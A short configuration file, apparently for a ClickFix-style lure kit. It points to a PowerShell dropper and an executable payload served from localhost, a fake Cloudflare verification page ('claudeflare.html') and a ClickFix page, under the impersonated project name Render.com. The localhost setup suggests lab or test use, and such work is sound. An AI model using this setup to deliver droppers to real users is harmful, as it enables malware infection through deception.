[Urls]
powershell_dropper_url = http://localhost:3000/malserve
actual_binary_payload = http://localhost:3000/bin/grim-grammer-v2.exe
[Paths]
cloudflare_page = static/claudeflare.html
clickfix_page = static/clickfix.html
dropper = bin/test.ps1
binary_payload = bin/grim-grammer-v2.exe
[Names]
project_name = Render.com
[Rules]